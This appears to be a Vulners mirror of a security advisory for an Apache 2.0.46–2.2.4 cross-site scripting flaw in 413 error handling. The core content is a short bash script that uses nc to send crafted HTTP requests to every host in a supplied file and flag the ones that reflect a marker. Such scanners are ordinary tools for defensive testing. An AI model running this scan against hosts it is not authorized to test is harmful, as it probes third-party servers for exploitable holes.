Apache 2.2.4 - 413 Error HTTP Request Method Cross-Site Scripting
| Reporter | Title | Published | Views | Family All 36 |
|---|---|---|---|---|
| Apache < 2.2.8 Multiple Vulnerabilities | 20 Feb 200800:00 | – | nessus | |
| Apache < 2.0.63 Multiple XSS Vulnerabilities | 7 Mar 200800:00 | – | nessus | |
| Apache 2.2.x < 2.2.8 Multiple Vulnerabilities (XSS, DoS) | 20 Feb 200800:00 | – | nessus | |
| GLSA-200803-19 : Apache: Multiple vulnerabilities | 13 Mar 200800:00 | – | nessus | |
| Mac OS X Multiple Vulnerabilities (Security Update 2008-002) | 19 Mar 200800:00 | – | nessus | |
| SuSE9 Security Update : Apache 2 (YOU Patch Number 12124) | 24 Sep 200900:00 | – | nessus | |
| openSUSE 10 Security Update : apache2 (apache2-5125) | 4 Apr 200800:00 | – | nessus | |
| openSUSE 10 Security Update : apache2 (apache2-5126) | 4 Apr 200800:00 | – | nessus | |
| openSUSE 10 Security Update : apache2 (apache2-5127) | 4 Apr 200800:00 | – | nessus | |
| SuSE 10 Security Update : Apache 2 (ZYPP Patch Number 5128) | 4 Apr 200800:00 | – | nessus |
10
source: https://www.securityfocus.com/bid/26663/info
Apache is prone to a cross-site scripting weakness when handling HTTP request methods that result in 413 HTTP errors.
An attacker may exploit this issue to steal cookie-based authentication credentials and launch other attacks.
Apache 2.0.46 through 2.2.4 are vulnerable; other versions may also be affected.
#!/bin/bash
# PR07-37-scan
if [ $# -ne 1 ]
then
echo "$0 <hosts-file>"
exit
fi
for i in `cat $1`
do
if echo -en "<PROCHECKUP> / HTTP/1.1\nHost: $i\nConnection:
close\nContent-length: 0\nContent-length: 0\n\n" | nc -w 4 $i 80 | grep
-i '<PROCHECKUP>' > /dev/null
then
echo "$i is VULNERABLE!"
fi
doneData
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation
10 Jan 2014 00:00Current
7.1High risk
Vulners AI Score7.1
CVSS 24.3
EPSS0.80749